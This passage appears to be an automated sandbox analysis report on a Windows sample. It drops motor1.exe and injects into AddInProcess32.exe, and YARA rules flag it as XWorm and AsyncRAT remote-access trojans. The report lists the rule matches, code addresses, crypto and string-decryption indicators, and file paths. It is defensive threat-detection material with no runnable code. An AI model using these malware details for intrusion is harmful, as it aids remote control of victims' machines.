Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process Stats: CPU usage > 49%

Contains functionality to communicate with device drivers

Source: C:\Users\user\SystemRootDoc\motor1.exe

21_2_00007FFD9B1B8B30

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77A20	4_2_00007FFD93B77A20
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B76432	4_2_00007FFD93B76432
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7B030	4_2_00007FFD93B7B030
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B76440	4_2_00007FFD93B76440
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7A800	4_2_00007FFD93B7A800
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B73A00	4_2_00007FFD93B73A00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77BC0	4_2_00007FFD93B77BC0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B78D60	4_2_00007FFD93B78D60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7B360	4_2_00007FFD93B7B360
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B73B60	4_2_00007FFD93B73B60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77F80	4_2_00007FFD93B77F80
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B78120	4_2_00007FFD93B78120
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77520	4_2_00007FFD93B77520
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B75140	4_2_00007FFD93B75140
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B71F00	4_2_00007FFD93B71F00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B73D00	4_2_00007FFD93B73D00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7B2A2	4_2_00007FFD93B7B2A2
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B782B0	4_2_00007FFD93B782B0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B7A6C0	4_2_00007FFD93B7A6C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B714C0	4_2_00007FFD93B714C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B75860	4_2_00007FFD93B75860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B77860	4_2_00007FFD93B77860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93B76C70	4_2_00007FFD93B76C70
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E66440	4_2_00007FFD93E66440
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E66432	4_2_00007FFD93E66432
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6B030	4_2_00007FFD93E6B030
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67A20	4_2_00007FFD93E67A20
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6A800	4_2_00007FFD93E6A800
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E63A00	4_2_00007FFD93E63A00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67BC0	4_2_00007FFD93E67BC0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67F80	4_2_00007FFD93E67F80
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E68D60	4_2_00007FFD93E68D60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6B360	4_2_00007FFD93E6B360
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E63B60	4_2_00007FFD93E63B60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E65140	4_2_00007FFD93E65140
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E68120	4_2_00007FFD93E68120
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67520	4_2_00007FFD93E67520
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E61F00	4_2_00007FFD93E61F00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E63D00	4_2_00007FFD93E63D00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6A6C0	4_2_00007FFD93E6A6C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E614C0	4_2_00007FFD93E614C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E682B0	4_2_00007FFD93E682B0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6B2A2	4_2_00007FFD93E6B2A2
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E66C70	4_2_00007FFD93E66C70
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E65860	4_2_00007FFD93E65860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67860	4_2_00007FFD93E67860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94266C70	4_2_00007FFD94266C70
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94265860	4_2_00007FFD94265860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267860	4_2_00007FFD94267860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426A6C0	4_2_00007FFD9426A6C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD942614C0	4_2_00007FFD942614C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD942682B0	4_2_00007FFD942682B0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426B2A2	4_2_00007FFD9426B2A2
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94261F00	4_2_00007FFD94261F00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94263D00	4_2_00007FFD94263D00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94265140	4_2_00007FFD94265140
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94268120	4_2_00007FFD94268120
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267520	4_2_00007FFD94267520
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267F80	4_2_00007FFD94267F80
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94268D60	4_2_00007FFD94268D60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426B360	4_2_00007FFD9426B360
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94263B60	4_2_00007FFD94263B60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267BC0	4_2_00007FFD94267BC0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426A800	4_2_00007FFD9426A800
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94263A00	4_2_00007FFD94263A00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94266440	4_2_00007FFD94266440
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94266432	4_2_00007FFD94266432
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426B030	4_2_00007FFD9426B030
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267A20	4_2_00007FFD94267A20
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94645F80	4_2_00007FFD94645F80
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD945EF980	4_2_00007FFD945EF980
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94640640	4_2_00007FFD94640640
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94619460	4_2_00007FFD94619460
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946E1530	4_2_00007FFD946E1530
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94605760	4_2_00007FFD94605760
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946DB7F0	4_2_00007FFD946DB7F0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94669100	4_2_00007FFD94669100
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946151C0	4_2_00007FFD946151C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946152C0	4_2_00007FFD946152C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94646800	4_2_00007FFD94646800
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9462B280	4_2_00007FFD9462B280
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9468F340	4_2_00007FFD9468F340
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946D9320	4_2_00007FFD946D9320
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA3845570	4_2_00007FFDA3845570
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA3844E50	4_2_00007FFDA3844E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_0262D504	5_2_0262D504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_06621F38	5_2_06621F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_06622C79	5_2_06622C79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 7_2_00B80EC0	7_2_00B80EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_01030EC0	8_2_01030EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_01830EC0	12_2_01830EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_01900EC0	18_2_01900EC0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9277F980	21_2_00007FFD9277F980
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD92869320	21_2_00007FFD92869320
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9281F340	21_2_00007FFD9281F340
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD927BB280	21_2_00007FFD927BB280
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD927A52C0	21_2_00007FFD927A52C0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9279B420	21_2_00007FFD9279B420
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD927F9100	21_2_00007FFD927F9100
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A5A10	21_2_00007FFD9B1A5A10
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B19E8F0	21_2_00007FFD9B19E8F0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1AC040	21_2_00007FFD9B1AC040
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1AAE90	21_2_00007FFD9B1AAE90
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1B5EA0	21_2_00007FFD9B1B5EA0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A1EA0	21_2_00007FFD9B1A1EA0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A5F10	21_2_00007FFD9B1A5F10
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B197DF0	21_2_00007FFD9B197DF0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1B2C80	21_2_00007FFD9B1B2C80

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: String function: 00007FFD945EF980 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: String function: 00007FFD946E9E50 appears 98 times

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 76

PE file does not import any functions

Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: pKxhpP0spW.exe, 00000001.00000000.2370966893.00007FF71D0DB000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameIhagutayetovafuniji.exe4 vs pKxhpP0spW.exe

Yara signature match

Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
